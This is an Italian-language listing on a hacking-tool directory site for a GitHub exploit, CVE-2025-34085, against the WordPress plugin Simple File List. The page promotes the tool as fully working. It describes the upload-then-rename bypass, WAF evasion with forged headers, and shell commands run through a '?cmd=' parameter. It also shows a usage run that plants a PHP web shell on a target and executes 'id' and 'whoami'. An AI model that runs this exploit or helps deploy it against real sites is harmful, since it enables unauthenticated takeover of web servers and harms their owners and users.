Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-34085 — Simple File List – Exploit RCE non autenticato (CVE-2025-34085) | Kitploit
Strumenti/GitHubGitHub/mrjhaxcore/cve-2025-34085
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – Exploit RCE non autenticato (CVE-2025-34085)

Vedi Repository
121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

📂 Simple File List – Exploit RCE non autenticato (CVE-2025-34085)

⚠️ Codice exploit di: Mrj Haxcore

Uno script Python completamente funzionante per il plugin WordPress Simple File List (<= 4.2.3), vulnerabile a esecuzione remota di codice (RCE) non autenticata a causa di una logica non sicura di caricamento e rinomina dei file.


💣 Riepilogo della vulnerabilità

  • Plugin: Simple File List (simple-file-list)
  • Versione: <= 4.2.3
  • CVE: CVE-2025-34085
  • Impatto: utenti non autenticati possono caricare un file PHP camuffato da .png, rinominarlo in .php ed eseguire codice arbitrario.
  • Requisiti: nessuna autenticazione richiesta
  • Tipo di exploit: Caricamento file → Bypass della rinomina → Esecuzione di comandi

✅ Caratteristiche

  • 🚀 Catena di exploit completamente automatizzata
  • 📤 Builder manuale di multipart/form-data (bypassa il 415)
  • 🔁 Forza bruta sulla rinomina per .php, .php5, .phtml, ecc.
  • 🛡️ Header contraffatti realistici per bypassare i WAF
  • 🐚 Esecuzione di comandi tramite ?cmd=
  • 🧼 Output pulito (senza sporcizia �PNG)

  • 🛠 Utilizzo

    root@kitploit:~
    python3 simple.py https://target.site
    
    [+] Uploading shell as 8dkls0qp.png...
    [+] Upload successful.
    [+] Trying to rename to: 8dkls0qp.php...
    [+] Rename successful: 8dkls0qp.php
    [+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
    [+] Shell output:
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    Manual Visit
    
    https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
    
    Scarica lo strumento